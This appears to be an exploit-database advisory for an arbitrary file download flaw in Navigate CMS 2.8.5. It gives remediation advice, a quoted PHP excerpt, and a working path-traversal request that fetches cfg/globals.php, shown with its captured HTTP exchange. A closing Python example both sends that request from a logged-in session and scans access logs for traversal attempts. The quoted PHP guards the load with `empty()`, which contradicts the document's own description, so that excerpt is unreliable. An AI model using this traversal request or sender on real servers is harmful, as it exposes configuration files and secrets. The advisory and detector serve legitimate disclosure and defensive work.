Vulnerability Overview
Vulnerability name: Navigate CMS 2.8.5 - Arbitrary File Download
EDB-ID: 45615
Author: Ihsan Sencan
Type: Webapps
Platform: PHP
Date: 2018-10-16
Verification status: Verified

Affected Scope
Affected software: Navigate CMS 2.8.5
Vulnerability description: An authenticated user whose profile is "User" (the default profile, id 2) or higher can download arbitrary files from the server through navigate_download.php. The script reads the `id` request parameter and hands it to `$item->load()` as supplied, without rejecting path separators or `..` components. Because `$_REQUEST` values are always strings, the `is_int($id)` branch never runs and the unvalidated string branch is always taken. A request with `id=../../cfg/globals.php` is answered with 200 OK in the capture below.
Test environment: Win7_x64/KaliLinux_x64

Remediation
Recommendation: Update Navigate CMS to the latest version, or apply other safeguards against arbitrary file download: reject `..` and path separators in `id`, resolve the requested path and check that it stays inside the intended download directory before opening it, and prefer looking files up by database id or hash rather than by a client-supplied path. Until a fix is deployed, restrict navigate_download.php to trusted accounts and watch the web-server access log for `id` values containing `../` (plain or URL-encoded).

POC Code

Exploit Title: Navigate CMS 2.8.5 - Arbitrary File Download
Dork: N/A
Date: 2018-10-13
Exploit Author: Ihsan Sencan
Vendor Homepage: https://www.navigatecms.com/
Software Link: http://master.dl.sourceforge.net/project/navigatecms/releases/navigate-2.8.5r1355.zip
Version: 2.8.5
Category: Webapps
Tested on: Win7_x64/KaliLinux_x64
CVE: N/A

POC:

1) Description

Profile type users+ can download arbitrary files.

http://TARGET/[PATH]/navigate_download.php?wid=&id=[FILE]

Dump of the profiles table of the test installation (table name `'exploitdb_' . 'nv_profiles'`), showing the two profile types; the default "User" profile (id 2) is sufficient:

```php
/* 'exploitdb_' . 'nv_profiles' */
$nv_profiles = array(
    array('id' => '1', 'name' => 'Administrator', 'description' => '', 'menus' => ['2','3','4','6','1']),
    array('id' => '2', 'name' => 'User', 'description' => 'Default Navigate CMS user profile', 'menus' => ['2','3','7'])
);
```

Relevant excerpt of navigate_download.php, as quoted in the advisory. The `id` parameter reaches `$item->load()` unchanged; `wid` is only consulted afterwards and may be left empty:

```php
........
$id = $_REQUEST['id'];
if(empty($_REQUEST['id']))
{
    if(is_int($id))
        $item->load($id);
    else
        $item->load($_REQUEST['id']);
}

if(!$item->id)
{
    echo 'Error: no item found with id ' . $_REQUEST['id'] . '.';
    session_write_close();
    $DB->disconnect(); // we don't need the database anymore (we'll see)
    exit;
}

$website = new Website();
if(empty($_GET['wid']))
........
```

2) Request and response

http://TARGET/[PATH]/navigate_download.php?wid=&id=../../cfg/globals.php

Note the session cookies in the request: the exploit is run from an authenticated session, not anonymously.

```http
GET /[PATH]/navigate_download.php?wid=&id=../../cfg/globals.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: navigate-language=en; PHPSESSID=43c3fe79r969u85bklqak7o03; NVSID_ec36e8b8=43c3fe79r969u85bklqak7o03; navigate-tinyce-scroll=47B7D0
Connection: keep-alive
```

```http
HTTP/1.1 200 OK
Date: Sat, 13 Oct 2018 13:36:12 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: NVSID_ec36e8b8=43c3fe79r969u85bklqak7o03; path=/
Set-Cookie: NVSID_ec36e8b8=43c3fe79r969u85bklqak7o03; expires=Sat, 13-Oct-2018 13:36:12 GMT; Max-Age=3600; path=/; domain=TARGET
Set-Cookie: PHPSESSID=43c3fe79r969u85bklqak7o03; expires=Sat, 13-Oct-2018 13:36:12 GMT; Max-Age=3600; path=/; domain=TARGET
Expires: Sat, 20 Oct 2018 12:36:12 GMT
Cache-Control: private
Pragma: cache
ETag: "L14vL14vL14vL14vL14vL14vL14vL14v...
```

The ETag value in the captured response is a very long repetition of `L14v` and is cut off in the capture; the response body is not included.
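The following is an added example and is not part of the EDB-45615 advisory or of Navigate CMS. It does two things a practitioner would want around this issue: it rebuilds the advisory's request (empty `wid`, attacker-controlled `id`) so it can be sent from an authenticated session, and it scans Apache-style access-log lines for `id` values sent to navigate_download.php that contain a `..` path component, decoding once for `%2e%2e%2f` and twice for double-encoded variants. The installation path `/navigate/`, the log lines and the assumption that `PHPSESSID` alone carries the session are all constructed for this example.

```python
"""
Added example (not from the advisory or from Navigate CMS): build the
navigate_download.php PoC request and detect traversal attempts against
it in access-log lines.

Assumptions not taken from the original page: the CMS lives under
/navigate/, the log lines are constructed, and PHPSESSID is the only
cookie an authenticated request needs.
"""
import re
import urllib.request
from urllib.parse import parse_qs, unquote, urlencode, urlsplit

DOWNLOAD_SCRIPT = "navigate_download.php"   # script named in the advisory

# ".." as a whole path component, with either / or \ as separator
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")

# Apache "common" log format; only the request target is used
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def build_poc_url(base_url: str, target_file: str) -> str:
    """Reproduce the advisory's request: wid left empty, id = attacker path."""
    query = urlencode({"wid": "", "id": target_file}, safe="/")
    return base_url.rstrip("/") + "/" + DOWNLOAD_SCRIPT + "?" + query


def fetch_as_user(url: str, phpsessid: str, timeout: float = 10.0) -> bytes:
    """Send the request with an authenticated session cookie.

    The advisory states a "User" profile or higher is needed, so supply a
    PHPSESSID from a logged-in session. Network call; not exercised offline.
    """
    req = urllib.request.Request(url, headers={"Cookie": f"PHPSESSID={phpsessid}"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()


def decoded_id_values(target: str):
    """Yield each `id` value sent to the download script, decoded twice so
    that plain, URL-encoded and double-encoded forms all compare equal."""
    parts = urlsplit(target)
    if not parts.path.endswith("/" + DOWNLOAD_SCRIPT):
        return
    # parse_qs already decodes once; unquote again to undo double encoding
    for raw in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        yield unquote(raw)


def is_traversal(value: str) -> bool:
    """True when the value contains a '..' path component."""
    return bool(TRAVERSAL_RE.search(value))


def scan_access_log(lines):
    """Return one record per request whose id parameter contains traversal."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for value in decoded_id_values(m.group("target")):
            if is_traversal(value):
                hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "id": value, "status": m.group("status")})
    return hits


# Constructed sample log lines (not a real capture). Lines 1, 2 and 5 are
# traversal attempts in plain, URL-encoded and double-encoded form; line 4
# targets a different script and must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Oct/2018:13:36:12 +0000] "GET /navigate/navigate_download.php?wid=&id=../../cfg/globals.php HTTP/1.1" 200 1832',
    '10.0.0.5 - - [13/Oct/2018:13:36:40 +0000] "GET /navigate/navigate_download.php?wid=&id=%2e%2e%2f%2e%2e%2fcfg%2fglobals.php HTTP/1.1" 200 1832',
    '10.0.0.7 - - [13/Oct/2018:13:37:02 +0000] "GET /navigate/navigate_download.php?wid=1&id=42 HTTP/1.1" 200 5120',
    '10.0.0.7 - - [13/Oct/2018:13:37:10 +0000] "GET /navigate/index.php?id=../../x HTTP/1.1" 200 9000',
    '10.0.0.9 - - [13/Oct/2018:13:38:00 +0000] "GET /navigate/navigate_download.php?wid=&id=..%252F..%252Fcfg%252Fglobals.php HTTP/1.1" 200 1832',
]

if __name__ == "__main__":
    print(build_poc_url("http://TARGET/navigate/", "../../cfg/globals.php"))
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

The detector decodes twice deliberately: a single `unquote` misses `..%252F`, which a proxy or the application may decode again before the file is opened. Matching on a `..` component rather than on the literal string `../` also catches backslash separators, which matter on the Win32 Apache build named in the response headers.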